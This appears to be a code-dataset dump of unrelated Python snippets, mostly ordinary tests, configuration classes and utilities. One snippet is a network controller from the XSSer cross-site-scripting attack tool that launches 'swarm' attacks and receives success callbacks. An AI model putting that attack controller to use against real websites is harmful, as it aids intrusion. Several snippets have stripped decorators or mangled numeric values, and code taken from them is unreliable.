code
stringlengths
281
23.7M
def test_traverse_overridden_option_1(): options = {'option2': 'option2'} config = providers.Configuration() config.option1.from_dict(options) all_providers = list(config.traverse()) assert (len(all_providers) == 2) assert (config.option1 in all_providers) assert (config.last_overriding in all_providers)
('foremast.elb.format_listeners.get_template') def test_elb_cert_name_v2(rendered_template): rendered_template.return_value = SAMPLE_TLSCERT_V2_JSON iam_cert = 'arn:aws:iam:::server-certificate/wildcard.example.com-2020-07-15' assert (iam_cert == format_cert_name(env='prod', account='', region='us-east-1', certificate='wildcard.example.com')) acm_cert = 'arn:aws:acm:us-east-1::certificate/-2222-3333-4444-' assert (acm_cert == format_cert_name(env='prod', account='', region='us-east-1', certificate='wildcard.prod.example.com')) acm_region_cert = 'arn:aws:acm:us-west-2::certificate/-0000-2222-3333-' assert (acm_region_cert == format_cert_name(env='prod', account='', region='us-west-2', certificate='wildcard.prod.example.com'))
class FlacFormat(CaseInsensitiveBaseFormat): MutagenType = flac.FLAC tag_mapping = {'cover': '__cover', 'language': 'Language', '__rating': 'rating'} writable = True case_sensitive = False def get_bitrate(self): return (- 1) def get_keys_disk(self): keys = CaseInsensitiveBaseFormat.get_keys_disk(self) if self.mutagen.pictures: keys.append('cover') return keys def _get_tag(self, raw, tag): if (tag == '__cover'): return [CoverImage(type=p.type, desc=p.desc, mime=p.mime, data=p.data) for p in raw.pictures] elif (tag == 'rating'): if ('rating' not in raw): return [] data = int(raw['rating'][0]) return [str(self._rating_to_stars(data))] elif (tag == 'bpm'): if (settings.get_option('collection/use_legacy_metadata_mapping', False) and ('tempo' in raw)): tag = 'tempo' elif (tag == 'comment'): if (settings.get_option('collection/use_legacy_metadata_mapping', False) and ('description' in raw)): tag = 'description' return CaseInsensitiveBaseFormat._get_tag(self, raw, tag) def _set_tag(self, raw, tag, value): if (tag == '__cover'): raw.clear_pictures() for v in value: picture = Picture() picture.type = v.type picture.desc = v.desc picture.mime = v.mime picture.data = v.data raw.add_picture(picture) return elif (tag == 'rating'): value = [str(self._stars_to_rating(int(value[0])))] elif (tag == 'bpm'): if settings.get_option('collection/use_legacy_metadata_mapping', False): tag = 'tempo' value = [xl.unicode.to_unicode(v) for v in value] elif (tag == 'comment'): if settings.get_option('collection/use_legacy_metadata_mapping', False): tag = 'description' value = [xl.unicode.to_unicode(v) for v in value] else: value = [xl.unicode.to_unicode(v) for v in value] CaseInsensitiveBaseFormat._set_tag(self, raw, tag, value) def _del_tag(self, raw, tag): if (tag == '__cover'): raw.clear_pictures() elif (tag in raw): del raw[tag]
def test_result_to_table(df): model = Lm('DV ~ IV1 + IV3', data=df) model.fit(summarize=False) formatted = result_to_table(model, drop_intercept=False) assert isinstance(formatted, pd.DataFrame) assert (formatted.shape == (3, 6)) assert (set(['Predictor', 'b', 'ci', 't', 'df', 'p']) == set(formatted.columns)) assert (formatted.iloc[(0, (- 1))] == '< .001') formatted = result_to_table(model, drop_intercept=True) assert isinstance(formatted, pd.DataFrame) assert (formatted.shape == (2, 6))
def test_relative_layout(manager): layout = textwrap.dedent('\n from qtile_extras.popup.toolkit import PopupRelativeLayout, PopupText\n self.popup = PopupRelativeLayout(\n self,\n controls=[\n PopupText(\n "Test",\n pos_x=0.1,\n pos_y=0.2,\n width=0.5,\n height=0.6\n )\n ],\n margin=0\n )\n\n self.popup.show()\n ') manager.c.eval(layout) (_, info) = manager.c.eval('self.popup.info()') info = eval(info) control = info['controls'][0] assert (control['x'] == 20) assert (control['y'] == 40) assert (control['width'] == 100) assert (control['height'] == 120)
class Tool(BaseModel): class Config(): extra = Extra.forbid arbitrary_types_allowed = True function: Callable[(..., str)] name: str = '' description: str = '' coroutine: Optional[Callable[(..., Awaitable[str])]] = None def run(self, tool_input: Dict[(str, str)]) -> str: return self.function(**tool_input)
class PythonDropTarget(wx.DropTarget): def __init__(self, handler): super().__init__() self.handler = handler self.data_object = wx.DataObjectComposite() self.data = wx.CustomDataObject(PythonObject) self.data_object.Add(self.data, preferred=True) self.file_data = wx.FileDataObject() self.data_object.Add(self.file_data) self.SetDataObject(self.data_object) def OnData(self, x, y, default_drag_result): if ((clipboard.drop_source is not None) and (not clipboard.drop_source.allow_move)): default_drag_result = wx.DragCopy elif (clipboard.drop_source is None): if self.GetData(): try: from apptools.io import File from apptools.naming.api import Binding names = self.file_data.GetFilenames() files = [] bindings = [] for name in names: f = File(name) files.append(f) bindings.append(Binding(name=name, obj=f)) clipboard.data = files clipboard.node = bindings except ImportError: pass if hasattr(self.handler, 'wx_dropped_on'): drag_result = self.handler.wx_dropped_on(x, y, clipboard.data, default_drag_result) elif hasattr(self.handler, 'on_drop'): drag_result = self.handler.on_drop(x, y, clipboard.data, default_drag_result) else: self.handler(x, y, clipboard.data) drag_result = default_drag_result drop_source = clipboard.drop_source if (drop_source is not None): drop_source.on_dropped(drag_result) clipboard.drop_source = None return default_drag_result def OnDragOver(self, x, y, default_drag_result): data = clipboard.data if (clipboard.drop_source is None): if (not hasattr(self.handler, 'wx_drag_any')): return default_drag_result data = None elif (not clipboard.drop_source.allow_move): default_drag_result = wx.DragCopy if hasattr(self.handler, 'wx_drag_any'): drag_result = self.handler.wx_drag_any(x, y, data, default_drag_result) elif hasattr(self.handler, 'wx_drag_over'): drag_result = self.handler.wx_drag_over(x, y, data, default_drag_result) elif hasattr(self.handler, 'on_drag_over'): drag_result = self.handler.on_drag_over(x, y, data, default_drag_result) else: drag_result = default_drag_result return drag_result def OnLeave(self): if hasattr(self.handler, 'wx_drag_leave'): self.handler.wx_drag_leave(clipboard.data) def OnDrop(self, x, y): return True
class ReqContext(BaseModel): user_name: Optional[str] = Field(None, description='The user name of the model request.') sys_code: Optional[str] = Field(None, description='The system code of the model request.') conv_uid: Optional[str] = Field(None, description='The conversation uid of the model request.')
class OAuth2TokenRequest(_common.FlyteIdlEntity): class Type(Enum): CLIENT_CREDENTIALS = _sec.OAuth2TokenRequest.Type.CLIENT_CREDENTIALS name: str client: OAuth2Client idp_discovery_endpoint: Optional[str] = None token_endpoint: Optional[str] = None type_: Type = Type.CLIENT_CREDENTIALS def to_flyte_idl(self) -> _sec.OAuth2TokenRequest: return _sec.OAuth2TokenRequest(name=self.name, type=self.type_, token_endpoint=self.token_endpoint, idp_discovery_endpoint=self.idp_discovery_endpoint, client=(self.client.to_flyte_idl() if self.client else None)) def from_flyte_idl(cls, pb2_object: _sec.OAuth2TokenRequest) -> 'OAuth2TokenRequest': return cls(name=pb2_object.name, idp_discovery_endpoint=pb2_object.idp_discovery_endpoint, token_endpoint=pb2_object.token_endpoint, type_=pb2_object.type, client=(OAuth2Client.from_flyte_idl(pb2_object.client) if pb2_object.HasField('client') else None))
class HttpDialogues(Model, BaseHttpDialogues): def __init__(self, **kwargs: Any) -> None: Model.__init__(self, **kwargs) def role_from_first_message(message: Message, receiver_address: Address) -> BaseDialogue.Role: return BaseHttpDialogue.Role.CLIENT BaseHttpDialogues.__init__(self, self_address=str(self.skill_id), role_from_first_message=role_from_first_message)
class AddRecordForm(forms.ModelForm): first_name = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'First Name', 'class': 'form-control'}), label='') last_name = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Last Name', 'class': 'form-control'}), label='') email = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Email', 'class': 'form-control'}), label='') phone = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Phone', 'class': 'form-control'}), label='') address = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Address', 'class': 'form-control'}), label='') city = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'City', 'class': 'form-control'}), label='') state = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'State', 'class': 'form-control'}), label='') zipcode = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Zipcode', 'class': 'form-control'}), label='') class Meta(): model = Record exclude = ('user',)
def extractTraventranslatesWordpressCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return None tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')] for (tagname, name, tl_type) in tagmap: if (tagname in item['tags']): return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
def get_boundary_bin_id(hic, bed_fh): line_number = 0 boundaries = set() for line in bed_fh.readlines(): line_number += 1 line = toString(line) if (line.startswith('browser') or line.startswith('track') or line.startswith('#')): continue try: (chrom, start, end) = line.strip().split('\t')[0:3] except Exception as detail: msg = 'Could not read line\n{}\n. {}'.format(line, detail) log.exception(msg) sys.exit() try: start = int(start) end = int(end) except ValueError as detail: msg = 'Error reading line: {}. One of the fields is not an integer.\nError message: {}'.format(line_number, detail) log.exception(msg) sys.exit() assert (start <= end), 'Error in line #{}, end1 larger than start1 in {}'.format(line_number, line) (start_bin, end_bin) = hic.getRegionBinRange(chrom, start, end) boundaries.add(start_bin) boundaries.add(end_bin) return np.sort(list(boundaries))
def register(): logging_format = ((('[%(levelname)s] ' + '(%(asctime)s) ') + '{0}.%(module)s.%(funcName)s():L%(lineno)s'.format(__package__)) + ' - %(message)s') logging.basicConfig(level=logging.DEBUG, format=logging_format, datefmt='%Y/%m/%d %H:%M:%S') for cls in classes: bpy.utils.register_class(cls)
class AsyncChainMixin(AsyncChainAPI): chaindb_class: Type[ChainDatabaseAPI] = AsyncChainDB coro_get_ancestors = async_method(Chain.get_ancestors) coro_get_block_by_hash = async_method(Chain.get_block_by_hash) coro_get_block_by_header = async_method(Chain.get_block_by_header) coro_get_block_header_by_hash = async_method(Chain.get_block_header_by_hash) coro_get_canonical_block_by_number = async_method(Chain.get_canonical_block_by_number) coro_get_canonical_head = async_method(Chain.get_canonical_head) coro_get_canonical_block_header_by_number = async_method(Chain.get_canonical_block_header_by_number) coro_get_canonical_transaction_index = async_method(Chain.get_canonical_transaction_index) coro_get_canonical_transaction = async_method(Chain.get_canonical_transaction) coro_get_canonical_transaction_by_index = async_method(Chain.get_canonical_transaction_by_index) coro_get_score = async_method(Chain.get_score) coro_get_transaction_receipt = async_method(Chain.get_transaction_receipt) coro_get_transaction_receipt_by_index = async_method(Chain.get_transaction_receipt_by_index) coro_import_block = async_method(Chain.import_block) coro_validate_chain = async_method(Chain.validate_chain) coro_validate_receipt = async_method(Chain.validate_receipt)
def test_irapbin_load_meta_first_bytesio(): logger.info('Import and export...') with open(TESTSET1, 'rb') as fin: stream = io.BytesIO(fin.read()) xsurf = xtgeo.surface_from_file(stream, fformat='irap_binary', values=False) assert (xsurf.ncol == 554) assert (xsurf.nrow == 451) xsurf.describe() xsurf.load_values() xsurf.describe() stream.close() with pytest.raises(ValueError) as verr: xsurf = xtgeo.surface_from_file(stream, fformat='irap_binary', values=False) assert ('I/O operation on closed file' in str(verr.value))
def test_transaction_confirmation_serialization(): msg = TacMessage(performative=TacMessage.Performative.TRANSACTION_CONFIRMATION, transaction_id='some_transaction_id', amount_by_currency_id={'key_1': 1, 'key_2': 2}, quantities_by_good_id={'key_1': 1, 'key_2': 2}) msg.to = 'receiver' envelope = Envelope(to=msg.to, sender='sender', message=msg) envelope_bytes = envelope.encode() actual_envelope = Envelope.decode(envelope_bytes) expected_envelope = envelope assert (expected_envelope.to == actual_envelope.to) assert (expected_envelope.sender == actual_envelope.sender) assert (expected_envelope.protocol_specification_id == actual_envelope.protocol_specification_id) assert (expected_envelope.message != actual_envelope.message) actual_msg = TacMessage.serializer.decode(actual_envelope.message) actual_msg.to = actual_envelope.to actual_msg.sender = actual_envelope.sender expected_msg = msg assert (expected_msg == actual_msg)
class TrioQueue(BaseQueue): def __init__(self, capacity: int) -> None: (self._send_channel, self._receive_channel) = trio.open_memory_channel(max_buffer_size=capacity) async def get(self) -> typing.Any: return (await self._receive_channel.receive()) async def put(self, value: typing.Any) -> None: (await self._send_channel.send(value))
class AdsHistogramStats(AbstractObject): def __init__(self, api=None): super(AdsHistogramStats, self).__init__() self._isAdsHistogramStats = True self._api = api class Field(AbstractObject.Field): field_1d_click = '1d_click' field_1d_ev = '1d_ev' field_1d_view = '1d_view' field_28d_click = '28d_click' field_28d_view = '28d_view' field_7d_click = '7d_click' field_7d_view = '7d_view' action_brand = 'action_brand' action_canvas_component_id = 'action_canvas_component_id' action_canvas_component_name = 'action_canvas_component_name' action_carousel_card_id = 'action_carousel_card_id' action_carousel_card_name = 'action_carousel_card_name' action_category = 'action_category' action_converted_product_id = 'action_converted_product_id' action_destination = 'action_destination' action_device = 'action_device' action_event_channel = 'action_event_channel' action_link_click_destination = 'action_link_click_destination' action_location_code = 'action_location_code' action_reaction = 'action_reaction' action_target_id = 'action_target_id' action_type = 'action_type' action_video_asset_id = 'action_video_asset_id' action_video_sound = 'action_video_sound' action_video_type = 'action_video_type' dda = 'dda' inline = 'inline' interactive_component_sticker_id = 'interactive_component_sticker_id' interactive_component_sticker_response = 'interactive_component_sticker_response' skan_click = 'skan_click' skan_view = 'skan_view' value = 'value' _field_types = {'1d_click': 'list<int>', '1d_ev': 'list<int>', '1d_view': 'list<int>', '28d_click': 'list<int>', '28d_view': 'list<int>', '7d_click': 'list<int>', '7d_view': 'list<int>', 'action_brand': 'string', 'action_canvas_component_id': 'string', 'action_canvas_component_name': 'string', 'action_carousel_card_id': 'string', 'action_carousel_card_name': 'string', 'action_category': 'string', 'action_converted_product_id': 'string', 'action_destination': 'string', 'action_device': 'string', 'action_event_channel': 'string', 'action_link_click_destination': 'string', 'action_location_code': 'string', 'action_reaction': 'string', 'action_target_id': 'string', 'action_type': 'string', 'action_video_asset_id': 'string', 'action_video_sound': 'string', 'action_video_type': 'string', 'dda': 'list<int>', 'inline': 'list<int>', 'interactive_component_sticker_id': 'string', 'interactive_component_sticker_response': 'string', 'skan_click': 'list<int>', 'skan_view': 'list<int>', 'value': 'list<int>'} def _get_field_enum_info(cls): field_enum_info = {} return field_enum_info
class ReportForm(FlaskForm): reason = TextAreaField(_('Reason'), validators=[DataRequired(message=_('What is the reason for reporting this post?'))]) submit = SubmitField(_('Report post')) def save(self, user, post): report = Report(reason=self.reason.data) return report.save(post=post, user=user)
def main(interface: 'Decompiler'): args = parse_commandline() configure_logging(level=VERBOSITY_TO_LOG_LEVEL[min(3, args.verbose)]) options = Options.from_cli(args) if args.print: print(options) return decompiler = interface.from_path(args.binary, options) if (args.outfile is None): output_stream = None color = ((args.color == Colorize.ALWAYS) or ((args.color != Colorize.NEVER) and isatty(stdout.fileno()))) else: output_stream = open(args.outfile, 'w', encoding='utf-8') color = False try: if (args.all or (not args.function)): undecorated_code = decompiler.decompile_all(options) DecoratedCode.print_code(undecorated_code, output_stream, color, style=options.getstring('code-generator.style_cmd', fallback='paraiso-dark')) else: for function_name in args.function: task = decompiler.decompile(function_name, options) DecoratedCode.print_code(task.code, output_stream, color, style=task.options.getstring('code-generator.style_cmd', fallback='paraiso-dark')) finally: if (output_stream is not None): output_stream.close()
def main(pull_request: str, github: ghstack.github.GitHubEndpoint, sh: Optional[ghstack.shell.Shell]=None, close: bool=False) -> None: params = ghstack.github_utils.parse_pull_request(pull_request) pr_result = github.graphql('\n query ($owner: String!, $name: String!, $number: Int!) {\n repository(name: $name, owner: $owner) {\n pullRequest(number: $number) {\n id\n }\n }\n }\n ', **params) pr_id = pr_result['data']['repository']['pullRequest']['id'] if close: logging.info('Closing {owner}/{name}#{number}'.format(**params)) github.graphql('\n mutation ($input: ClosePullRequestInput!) {\n closePullRequest(input: $input) {\n clientMutationId\n }\n }\n ', input={'pullRequestId': pr_id, 'clientMutationId': 'A'})
def exec_cmd(cmd_name: str, args: str, func_descript: json) -> None: full_command = ['sudo'] full_command.append(cmd_name) positional_arg = None for (arg, value) in args.items(): if ((value is not True) and (value is not False)): if (not is_positional_arg(cmd_name, arg)): arg_type = func_descript['parameters']['properties'][arg]['type'] if (arg_type in ['integer', 'float']): full_command.extend([f'--{arg}', f'{value}']) else: full_command.extend([f'--{arg}', f'"{value}"']) else: positional_arg = value else: full_command.append(f'--{arg}') if (positional_arg is not None): full_command.append(positional_arg) full_command = [str(item) for item in full_command] print('\x1b[1;32m', 'Run: ', ' '.join(full_command), '\x1b[0m') try: subprocess.run(full_command, text=True, check=True) except subprocess.CalledProcessError as err: print('\x1b[1;31m\x08Failed to execute command!\x1b[0m') print(err)
def get_test_functions(integration_dim, backend, use_multi_dim_integrand): if (integration_dim == 1): res = [Polynomial(4.0, [2.0], is_complex=False, backend=backend, integrand_dims=1), Polynomial(0, [0, 1], is_complex=False, backend=backend, integrand_dims=1), Polynomial((2 / 3), [0, 0, 2], domain=[[0, 1]], is_complex=False, backend=backend, integrand_dims=1), Polynomial(27.75, [3, (- 1), 2, (- 3)], domain=[[(- 2), 1]], is_complex=False, backend=backend, integrand_dims=1), Polynomial((44648.0 / 15.0), [3, (- 1), 2, (- 3), 7], domain=[[(- 4), 4]], is_complex=False, backend=backend, integrand_dims=1), Polynomial((8939.0 / 60.0), [3, (- 1), 2, (- 3), 7, (- 1)], domain=[[2, 3]], is_complex=False, backend=backend, integrand_dims=1), Exponential((np.exp(1) - np.exp((- 2))), domain=[[(- 2), 1]], is_complex=False, backend=backend, integrand_dims=1), Exponential(((np.exp(2) - 1.0) / np.exp(3)), domain=[[(- 3), (- 1)]], is_complex=False, backend=backend, integrand_dims=1), Sinusoid(((2 * np.sin(1)) * np.sin(1)), domain=[[0, 2]], is_complex=False, backend=backend, integrand_dims=1), Polynomial(4j, [2j], is_complex=True, backend=backend, integrand_dims=1), Polynomial(0, [0, 1j], is_complex=True, backend=backend, integrand_dims=1), Polynomial((44648.0 / 15.0), [3, (- 1j), 2, (- 3j), 7], domain=[[(- 4), 4]], is_complex=True, backend=backend, integrand_dims=1)] if use_multi_dim_integrand: res += [Polynomial(np.array([[0.0], [4.0]]), [2.0], is_complex=False, backend=backend, integrand_dims=[2, 1]), Polynomial(np.array([0.0, 4.0]), [2.0], is_complex=False, backend=backend, integrand_dims=(2,)), Polynomial(np.array([[0.0, 4.0], [8.0, 12.0]]), [2.0], is_complex=False, backend=backend, integrand_dims=[2, 2]), Polynomial(np.array([[0.0, 0.0], [0.0, 0.0]]), [0, 1], is_complex=False, backend=backend, integrand_dims=[2, 2]), Polynomial(np.array([[[0.0, 4.0], [8.0, 12.0]], [[16.0, 20.0], [24.0, 28.0]]]), [2.0], is_complex=False, backend=backend, integrand_dims=[2, 2, 2]), Polynomial(np.array([[0.0, 0.0], [0.0, 0.0]]), [0, 1], is_complex=False, backend=backend, integrand_dims=[2, 2, 2])] return res elif (integration_dim == 3): res = [Polynomial(48.0, [2.0], integration_dim=3, is_complex=False, backend=backend, integrand_dims=1), Polynomial(0, [0, 1], integration_dim=3, is_complex=False, backend=backend, integrand_dims=1), Polynomial(8.0, coeffs=[0, 0, 1], integration_dim=3, is_complex=False, backend=backend, integrand_dims=1), Exponential(((27 * (np.exp(3) - 1)) / np.exp(2)), integration_dim=3, domain=[[(- 2), 1], [(- 2), 1], [(- 2), 1]], is_complex=False, backend=backend, integrand_dims=1), Sinusoid((24 * (np.sin(1) ** 2)), integration_dim=3, domain=[[0, 2], [0, 2], [0, 2]], is_complex=False, backend=backend, integrand_dims=1), Exponential(1.756, integration_dim=3, domain=[[(- 0.05), 0.1], [(- 0.25), 0.2], [(- np.exp(1)), np.exp(1)]], is_complex=False, backend=backend, integrand_dims=1), Polynomial(48j, [2j], integration_dim=3, is_complex=True, backend=backend, integrand_dims=1), Polynomial(0, [0, 1j], integration_dim=3, is_complex=True, backend=backend, integrand_dims=1), Polynomial(8j, coeffs=[0, 0, 1j], integration_dim=3, is_complex=True, backend=backend, integrand_dims=1)] if use_multi_dim_integrand: res += [Polynomial(np.array([[0.0], [48.0]]), integration_dim=3, is_complex=False, backend=backend, integrand_dims=[2, 1]), Polynomial(np.array([0.0, 48.0]), integration_dim=3, is_complex=False, backend=backend, integrand_dims=(2,)), Polynomial(np.array([[0.0, 48.0], [96.0, 144.0]]), integration_dim=3, is_complex=False, backend=backend, integrand_dims=[2, 2]), Polynomial(np.array([[0.0, 0.0], [0.0, 0.0]]), [0, 1], integration_dim=3, is_complex=False, backend=backend, integrand_dims=[2, 2]), Polynomial(np.array([[[0.0, 48.0], [96.0, 144.0]], [[192.0, 240.0], [288.0, 336.0]]]), integration_dim=3, domain=anp.array([[(- 1.0), 1.0], [(- 1.0), 1.0], [(- 1.0), 1.0]], like=backend, dtype=ar.to_backend_dtype('float64', like=backend)), is_complex=False, backend=backend, integrand_dims=[2, 2, 2]), Polynomial(np.array([[[0.0, 0.0], [0.0, 0.0]], [[0.0, 0.0], [0.0, 0.0]]]), [0, 1], integration_dim=3, is_complex=False, backend=backend, integrand_dims=[2, 2, 2])] return res elif (integration_dim == 10): return [Polynomial(3413., coeffs=[0, 0, 1], integration_dim=10, is_complex=False, backend=backend, integrand_dims=1), Polynomial(3413.j, coeffs=[0, 0, 1j], integration_dim=10, is_complex=True, backend=backend, integrand_dims=1)] else: raise ValueError(('Not testing functions implemented for integration_dim ' + str(integration_dim)))
class P3R1GE4JGF(DDR2Module): nbanks = 8 nrows = 8192 ncols = 1024 technology_timings = _TechnologyTimings(tREFI=(.0 / 8192), tWTR=(None, 7.5), tCCD=(2, None), tRRD=None) speedgrade_timings = {'default': _SpeedgradeTimings(tRP=12.5, tRCD=12.5, tWR=15, tRFC=(None, 127.5), tFAW=None, tRAS=None)}
class XSSerProtocol(Protocol): transport = None factory = None def connectionMade(self): self.factory._clients.append(self) print('new client connected...') def connectionLost(self, reason): self.factory._clients.remove(self) def sendHTTP(self, data): self.transport.write('HTTP/1.0 200 Found\n') self.transport.write('Content-Type: text/html; charset=UTF-8\n\n') self.transport.write(data) def dataReceived(self, data): print('Mosquito network ready ;)', data) if ((data.startswith('GET') and ('evangelion' in data)) or ('evangelion' in data)): print('EVAngelion swarm mode!\n') self.sendHTTP('Start Swarm Attack\n') app = xsser() app.set_reporter(self.factory) self.factory.xsser = app data = data.split('\n')[0] options = data.replace('GET ', '').split()[1:] print('OPTIONS', options) if (len(options) > 1): reactor.callInThread(self.factory.xsser.run, options) else: reactor.callInThread(self.factory.xsser.run) elif ('evangelion' in data): self.sendHTTP('Start Swarm Attack\n') reactor.callInThread(self.factory.xsser.run) elif data.startswith('GET /success'): print('SUCCESS!!', data.split('HTTP')[0].split('/')[(- 1)]) self.factory.xsser.final_attack_callback(data.split('HTTP')[0].split('/')[(- 1)].strip()) self.sendHTTP('thx for use XSSer ( !!\n') self.transport.loseConnection() elif data.startswith('GET'): self.sendHTTP("XSSer Web Interface <a href='evangelion'>Try it!</a>\n") elif data.startswith('close'): reactor.stop() else: self.transport.write('1')
def extractJinzeffectWpcomstagingCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return None tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')] for (tagname, name, tl_type) in tagmap: if (tagname in item['tags']): return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
def extract_flake8_rst_docstrings() -> Dict[(str, str)]: from flake8_rst_docstrings import code_mappings_by_level codes = dict() for (level, codes_mapping) in code_mappings_by_level.items(): for (message, number) in codes_mapping.items(): code = 'RST{}{:02d}'.format(level, number) codes[code] = message return codes
def _snowflake_execute_sql(adapter: BaseAdapter, sql: str, new_conn: bool, *, fetch: bool=True) -> Tuple[(AdapterResponse, pd.DataFrame)]: assert (adapter.type() == 'snowflake') import snowflake.connector as snowflake from dbt.adapters.snowflake import SnowflakeConnectionManager with _existing_or_new_connection(adapter, _connection_name('snowflake:execute_sql', sql), new_conn): connection_manager: SnowflakeConnectionManager = adapter.connections conn: snowflake.SnowflakeConnection = connection_manager.get_thread_connection().handle with connection_manager.exception_handler('EXECUTE SQL'): cur = conn.cursor() cur.execute(sql) res = connection_manager.get_response(cur) df = pd.DataFrame({}) if fetch: df: pd.DataFrame = cur.fetch_pandas_all() for desc in cur.description: if (desc.type_code in [5, 10]): import json df[desc.name] = df[desc.name].map((lambda v: json.loads(v))) return (res, df)
def calc_adaptation_matrices(w1: tuple[(float, float)], w2: tuple[(float, float)], m: Matrix) -> tuple[(Matrix, Matrix)]: src = alg.matmul(m, util.xy_to_xyz(w1), dims=alg.D2_D1) dest = alg.matmul(m, util.xy_to_xyz(w2), dims=alg.D2_D1) m2 = alg.diag(alg.divide(dest, src, dims=alg.D1)) adapt = alg.matmul(alg.solve(m, m2), m, dims=alg.D2) return (adapt, alg.inv(adapt))
def _test_data(db): baker.make('search.AwardSearch', award_id=1) baker.make('awards.ParentAward', award_id=1, generated_unique_award_id='CONT_IDV_2', direct_idv_count=3, direct_contract_count=4, direct_total_obligation='5.01', direct_base_and_all_options_value='6.02', direct_base_exercised_options_val='7.03', rollup_idv_count=8, rollup_contract_count=9, rollup_total_obligation='10.04', rollup_base_and_all_options_value='11.05', rollup_base_exercised_options_val='12.06')
def get_deck_mostly_linked_to_note(siac_nid: int) -> Optional[str]: conn = _get_connection() nids = conn.execute(f'select nid from notes_pdf_page where siac_nid = {siac_nid} order by rowid desc limit 50').fetchall() conn.close() if (len(nids) == 0): return None nids = ','.join([str(nid[0]) for nid in nids]) res = mw.col.db.first(f'select did, count(did) as cnt from (select did from cards where nid in ({nids})) group by did order by cnt desc limit 1') if (res is None): return None did = res[0] try: d = mw.col.decks.get(did)['name'] return d except: return None
class LruLockWrapper(): def __init__(self, lru: LRU) -> None: self.lru = lru self.lock = threading.Lock() def __getitem__(self, *args: Any, **kwargs: Any) -> Any: with self.lock: return self.lru.__getitem__(*args, **kwargs) def __setitem__(self, *args: Any, **kwargs: Any) -> Any: with self.lock: return self.lru.__setitem__(*args, **kwargs) def __contains__(self, *args: Any, **kwargs: Any) -> Any: with self.lock: return self.lru.__contains__(*args, **kwargs) def __delitem__(self, *args: Any, **kwargs: Any) -> Any: with self.lock: return self.lru.__delitem__(*args, **kwargs)
def main(): module_spec = schema_to_module_spec(versioned_schema) mkeyname = None fields = {'access_token': {'required': False, 'type': 'str', 'no_log': True}, 'enable_log': {'required': False, 'type': 'bool', 'default': False}, 'vdom': {'required': False, 'type': 'str', 'default': 'root'}, 'member_path': {'required': False, 'type': 'str'}, 'member_state': {'type': 'str', 'required': False, 'choices': ['present', 'absent']}, 'hardware_npu_np6_dce': {'required': False, 'type': 'dict', 'default': None, 'options': {}}} for attribute_name in module_spec['options']: fields['hardware_npu_np6_dce']['options'][attribute_name] = module_spec['options'][attribute_name] if (mkeyname and (mkeyname == attribute_name)): fields['hardware_npu_np6_dce']['options'][attribute_name]['required'] = True module = AnsibleModule(argument_spec=fields, supports_check_mode=False) check_legacy_fortiosapi(module) is_error = False has_changed = False result = None diff = None versions_check_result = None if module._socket_path: connection = Connection(module._socket_path) if ('access_token' in module.params): connection.set_option('access_token', module.params['access_token']) if ('enable_log' in module.params): connection.set_option('enable_log', module.params['enable_log']) else: connection.set_option('enable_log', False) fos = FortiOSHandler(connection, module, mkeyname) versions_check_result = check_schema_versioning(fos, versioned_schema, 'hardware_npu_np6_dce') (is_error, has_changed, result, diff) = fortios_hardware_npu_np6(module.params, fos) else: module.fail_json(**FAIL_SOCKET_MSG) if (versions_check_result and (versions_check_result['matched'] is False)): module.warn('Ansible has detected version mismatch between FortOS system and your playbook, see more details by specifying option -vvv') if (not is_error): if (versions_check_result and (versions_check_result['matched'] is False)): module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result, diff=diff) else: module.exit_json(changed=has_changed, meta=result, diff=diff) elif (versions_check_result and (versions_check_result['matched'] is False)): module.fail_json(msg='Error in repo', version_check_warning=versions_check_result, meta=result) else: module.fail_json(msg='Error in repo', meta=result)
class OptionSeriesTimelineLabelStyle(Options): def fontSize(self): return self._config_get('0.8em') def fontSize(self, num: float): self._config(num, js_type=False) def fontWeight(self): return self._config_get('bold') def fontWeight(self, text: str): self._config(text, js_type=False)
def test_generate_fiscal_year_and_quarter(): assert (fyh.generate_fiscal_year_and_quarter(date(2000, 9, 30)) == '2000-Q4') assert (fyh.generate_fiscal_year_and_quarter(date(2001, 10, 1)) == '2002-Q1') assert (fyh.generate_fiscal_year_and_quarter(date(2020, 3, 2)) == '2020-Q2') assert (fyh.generate_fiscal_year_and_quarter(date(2017, 5, 30)) == '2017-Q3') assert (fyh.generate_fiscal_year_and_quarter(date(2019, 10, 30)) == '2020-Q1')
class Label(Base, ReprMixIn): __tablename__ = 'labels' REPR_SQL_ATTR_SORT_FIRST = ['version_id', 'name', 'value'] version_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('versions.id', ondelete='CASCADE'), primary_key=True, nullable=False) name = sqlalchemy.Column(sqlalchemy.String(255), nullable=False, index=True, primary_key=True) value = sqlalchemy.Column(sqlalchemy.String(255), nullable=False, index=True)
class RawOutputDataConfig(FlyteIdlEntity): def __init__(self, output_location_prefix): self._output_location_prefix = output_location_prefix def output_location_prefix(self): return self._output_location_prefix def to_flyte_idl(self): return _common_pb2.RawOutputDataConfig(output_location_prefix=self.output_location_prefix) def from_flyte_idl(cls, pb2): return cls(output_location_prefix=pb2.output_location_prefix)
